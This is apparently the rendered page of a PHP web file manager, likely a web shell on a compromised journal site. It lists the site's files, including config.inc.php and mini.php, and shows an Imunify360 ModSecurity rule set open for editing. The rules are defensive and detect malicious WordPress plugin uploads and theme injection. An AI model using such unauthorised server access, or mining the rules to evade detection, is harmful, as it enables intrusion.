File Manager
Upload
Current Directory: /home/lartcid/public_html/journal.lartc.id
[Back]
..
[Open]
Hapus
Rename
.htaccess
[Edit]
Hapus
Rename
.well-known
[Open]
Hapus
Rename
README.md
[Edit]
Hapus
Rename
api
[Open]
Hapus
Rename
cache
[Open]
Hapus
Rename
cgi-bin
[Open]
Hapus
Rename
classes
[Open]
Hapus
Rename
config.TEMPLATE.inc.php
[Edit]
Hapus
Rename
config.inc.php
[Edit]
Hapus
Rename
controllers
[Open]
Hapus
Rename
cypress.json
[Edit]
Hapus
Rename
dbscripts
[Open]
Hapus
Rename
docs
[Open]
Hapus
Rename
error_log
[Edit]
Hapus
Rename
favicon.ico
[Edit]
Hapus
Rename
index.php
[Edit]
Hapus
Rename
js
[Open]
Hapus
Rename
lib
[Open]
Hapus
Rename
locale
[Open]
Hapus
Rename
mini.php
[Edit]
Hapus
Rename
pages
[Open]
Hapus
Rename
php.ini
[Edit]
Hapus
Rename
plugins
[Open]
Hapus
Rename
public
[Open]
Hapus
Rename
registry
[Open]
Hapus
Rename
scheduledTaskLogs
[Open]
Hapus
Rename
schemas
[Open]
Hapus
Rename
styles
[Open]
Hapus
Rename
templates
[Open]
Hapus
Rename
tools
[Open]
Hapus
Rename
Edit File
# ------------------------------------------------------ # Imunify360 ModSecurity Rules # Copyright (C) 2024 CloudLinux Inc All right reserved # The Imunify360 ModSecurity Rules is distributed under # IMUNIFY360 LICENSE AGREEMENT # ------------------------------------------------------ # WORDPRESS INITIATE # Track get action SecRule REQUEST_METHOD "GET" "id:77316804,chain,pass,nolog,severity:5,t:none,msg:'IM360 WAF: Track get action||T:APACHE||',tag:'service_im360',tag:'noshow',initcol:ip=%{tx.remote_addr}" SecRule IP:wp_logged_in "@eq 1" "t:none,setvar:ip.wp_get_req=1,expirevar:ip.wp_get_req=600" SecRule REQUEST_FILENAME "@endsWith /wp-admin/update.php" "chain,id:77350110,block,log,severity:2,t:none,t:normalizePath,msg:'IM360 WAF: WordPress plugin/theme auto install block||WPU:%{tx.log_cookie_350110}||Hash:%{tx.log_cookie_sha_350110}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||Logged:%{IP.wp_logged_in}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core'" SecRule REQUEST_METHOD "^POST$" "chain,t:none" SecRule ARGS:action "@rx upload-(?:plugin|theme)" "chain,t:none" SecRule IP:wp_auto_install "@eq 1" "chain,t:none" SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "@rx ^([^\|]+)\|" "chain,t:none,t:urlDecode,capture,setvar:tx.log_cookie_350110=%{TX.1}" SecRule TX:log_cookie_350110 "!@rx ^$" "t:none,t:urlDecode,t:sha1,t:hexEncode,capture,setvar:tx.log_cookie_sha_350110=%{MATCHED_VAR}" # MALICIOUS PLUGIN/THEME INSTALL # Track upload SecRule REQUEST_FILENAME "@endsWith /wp-admin/update.php" "id:77316759,chain,phase:2,pass,nolog,auditlog,severity:5,t:none,t:normalizePath,t:lowercase,msg:'IM360 WAF: WordPress plugin/theme install. Track upload||SC:%{SCRIPT_FILENAME}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'" SecRule REQUEST_METHOD "^POST$" "chain,t:none" SecRule ARGS:action "@rx upload-(plugin|theme)" "t:none,t:lowercase,setvar:TX.wp_plugin_upload=1" # Block malicious upload SecRule TX:wp_plugin_upload "@eq 1" "id:77316805,chain,block,log,phase:2,severity:2,t:none,initcol:ip=%{tx.remote_addr},msg:'IM360 WAF: WordPress plugin/theme install. Block automated upload||SC:%{SCRIPT_FILENAME}||WPU:%{tx.log_cookie_316805}||Hash:%{tx.log_cookie_sha_316805}||Time:%{TIME}||Addr:%{tx.remote_addr};login:%{IP.wp_logged_in};get:%{IP.wp_get_req};upl:%{TX.wp_plugin_upload}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core'" SecRule IP:wp_logged_in "@eq 1" "chain,t:none" SecRule &IP:wp_get_req "@eq 0" "chain,t:none" SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "@rx ^([^\|]+)\|" "chain,t:none,t:urlDecode,capture,setvar:tx.log_cookie_316805=%{TX.1}" SecRule TX:log_cookie_316805 "!@rx ^$" "t:none,t:urlDecode,t:sha1,t:hexEncode,capture,setvar:tx.log_cookie_sha_316805=%{MATCHED_VAR}" # Automatic plugin installation w/o referer SecRule REQUEST_FILENAME "@endsWith /wp-admin/update.php" "id:77350099,chain,pass,nolog,auditlog,severity:5,t:none,t:normalizePath,t:lowercase,msg:'IM360 WAF: WordPress plugin/theme install. Track referer||SC:%{SCRIPT_FILENAME}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'" SecRule REQUEST_METHOD "^POST$" "chain,t:none" SecRule ARGS:action "@rx upload-(plugin|theme)" "chain,t:none" SecRule REQUEST_HEADERS:Referer "!@contains /wp-admin/plugin-install.php?tab=upload" "t:none,t:normalizePath" # WP THEME INJECTION (TIMING & BEHAVIOUR) # Track theme edit SecRule REQUEST_URI "@rx \/wp-admin\/(?:admin-ajax|theme-editor)\.php" "id:77316868,chain,pass,nolog,auditlog,severity:5,t:none,t:normalizePath,t:lowercase,msg:'IM360 WAF: WordPress theme edit. Track edit||SC:%{SCRIPT_FILENAME}||File:%{ARGS.file}||Theme:%{ARGS.theme}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core',tag:'noshow'" SecRule REQUEST_METHOD "^POST$" "chain,t:none" SecRule ARGS:action "@rx edit-theme-plugin-file" "t:none,t:lowercase,setvar:TX.wp_theme_edit=1" # Block theme injection SecRule TX:wp_theme_edit "@eq 1" "id:77316869,chain,block,log,phase:2,severity:2,t:none,initcol:ip=%{tx.remote_addr},msg:'IM360 WAF: WordPress theme edit. Block malicious injection||SC:%{SCRIPT_FILENAME}||WPU:%{tx.log_cookie_316869}||Hash:%{tx.log_cookie_sha_316869}||Time:%{TIME}||Addr:%{tx.remote_addr};login:%{IP.wp_logged_in};get:%{IP.wp_get_req};edit:%{TX.wp_theme_edit}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core'" SecRule IP:wp_logged_in "@eq 1" "chain,t:none" SecRule &IP:wp_get_req "@eq 0" "chain,t:none" SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "@rx ^([^\|]+)\|" "chain,t:none,t:urlDecode,capture,setvar:tx.log_cookie_316869=%{TX.1}" SecRule TX:log_cookie_316869 "!@rx ^$" "t:none,t:urlDecode,t:sha1,t:hexEncode,capture,setvar:tx.log_cookie_sha_316869=%{MATCHED_VAR}" # BLOCK EMPTY REFERER SecRule TX:wp_plugin_upload|TX:wp_theme_edit "@eq 1" "id:77316819,chain,block,log,phase:2,severity:2,t:none,msg:'IM360 WAF: WordPress plugin/theme install or edit. Block empty Referer||WPU:%{tx.wp_user}||Theme install:%{FILES.themezip}||Theme:%{ARGS.theme}||Plugin:%{FILES.pluginzip}||File:%{ARGS.file}||User:%{SCRIPT_USERNAME}||T:APACHE||',tag:'wp_core'" SecRule &REQUEST_HEADERS:Referer "@eq 0" "chain,t:none" SecRule REQUEST_COOKIES:/wordpress_logged_in_/ "!@rx ^$" "t:none" # TRACK WORDPRESS THEME/PLUGIN ACTIVITY SecRule REQUEST_METHOD "@rx ^POST$" "id:77316925,chain,pass,nolog,auditlog,t:none,severity:7,msg:'IM360 WAF: WordPress theme/plugin activity track||File:%{ARGS.file}||SC:%{SCRIPT_FILENAME}||Action:%{TX.1}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'" SecRule REQUEST_FILENAME "@rx \/wp-admin\/(?:admin-ajax|theme-editor|plugin-install|update)\.php" "chain,t:none,t:urlDecodeUni,t:normalizePath" SecRule ARGS:action "@rx (?:edit-theme-plugin-file|update|activate|(?:upload|install-(?:plugin|theme)))" "t:none,capture" SecRule REQUEST_METHOD "@rx ^POST$" "id:77316926,chain,pass,nolog,auditlog,t:none,severity:7,msg:'IM360 WAF: WordPress theme/plugin activity track||SC:%{SCRIPT_FILENAME}||File:%{ARGS.file}||Action:%{TX.1}||Theme:%{FILES.themezip}||Plugin:%{FILES.pluginzip}||User:%{SCRIPT_USERNAME}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core',tag:'noshow'" SecRule REQUEST_FILENAME "@rx \/wp-admin\/(?:admin-ajax|theme-editor|plugin-install|update)\.php" "chain,t:none,t:urlDecodeUni,t:normalizePath" SecRule REQUEST_HEADERS:Referer "@rx action=(?:edit-theme-plugin-file|update|(?:upload|install-(?:plugin|theme)))" "t:none,capture" SecRule REQUEST_METHOD "POST" "id:77350274,chain,phase:2,pass,nolog,auditlog,severity:5,t:none,msg:'IM360 WAF: Theme customization in WordPress||MVN:%{MATCHED_VAR_NAME}||MV:%{MATCHED_VAR}||WPU:%{TX.wp_user}||T:APACHE||',tag:'wp_core'" SecRule REQUEST_FILENAME "@contains /admin-ajax.php" "chain,t:none,t:normalizePath" SecRule ARGS:action "@rx customize" "chain,t:none" SecRule ARGS:/customize/ "!@rx ^$" "t:none"
Simpan